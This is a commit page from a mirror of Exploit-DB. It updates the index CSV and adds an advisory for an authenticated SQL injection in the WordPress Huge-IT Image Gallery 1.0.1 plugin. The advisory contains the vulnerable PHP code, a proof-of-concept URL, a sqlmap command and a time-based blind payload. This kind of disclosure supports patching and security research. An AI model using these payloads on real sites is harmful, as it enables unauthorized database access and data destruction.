bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 09_04_2014

Browse source
This commit is contained in:
Offensive Security 2014-09-04 04:43:14 +00:00
parent 9eb0b0267d
commit dd650d9bb9
2 changed files with 97 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -15784,7 +15784,7 @@ id,file,description,date,author,platform,type,port
18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0
18232,platforms/php/webapps/18232.txt,"FCMS_2.7.2 cms and earlier multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 18232,platforms/php/webapps/18232.txt,"FCMS_2.7.2 cms and earlier multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0
18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0
18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0
18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0
18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0 18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0
18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0 18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0
@ -31088,8 +31088,9 @@ id,file,description,date,author,platform,type,port
34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80
34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466 34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466
34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0
34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400
34520,platforms/linux/dos/34520.txt,"Oracle MySQL <= 5.1.48 'HANDLER' interface Denial Of Service Vulnerability",2010-08-20,"Matthias Leich",linux,dos,0 34520,platforms/linux/dos/34520.txt,"Oracle MySQL <= 5.1.48 'HANDLER' interface Denial Of Service Vulnerability",2010-08-20,"Matthias Leich",linux,dos,0
34521,platforms/linux/dos/34521.txt,"Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0 34521,platforms/linux/dos/34521.txt,"Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0
34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0 34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0
34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0
34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80

Can't render this file because it is too large.

94
platforms/php/webapps/34524.txt Executable file
View file

@ -0,0 +1,94 @@
######################
# Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://huge-it.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip
Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location :
http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
######################
# Vulnerable code :
function editgallery($id)
{
global $wpdb;
if(isset($_GET["removeslide"])){
if($_GET["removeslide"] != ''){
$wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." ");
}
}
######################
# PoC Exploit:
http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2
# Exploit Code via sqlmap:
sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \
-p removeslide --dbms=mysql --level 3
[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable
...
...
...
---
Place: GET
Parameter: removeslide
Type: AND/OR time-based blind
Title: MySQL >= 5.0 time-based blind - Parameter replace
Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
# PoC Video:
https://www.youtube.com/watch?v=gAmb0_o3ZUc
######################
# Vulnerability Disclosure Timeline:
2014-08-25: Discovered vulnerability
2014-08-26: Vendor Notification (Web Customers Service Form)
2014-08-26: No Response/Feedback
2014-08-01: Plugin version 1.0.1 released without fix
2014-08-02: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################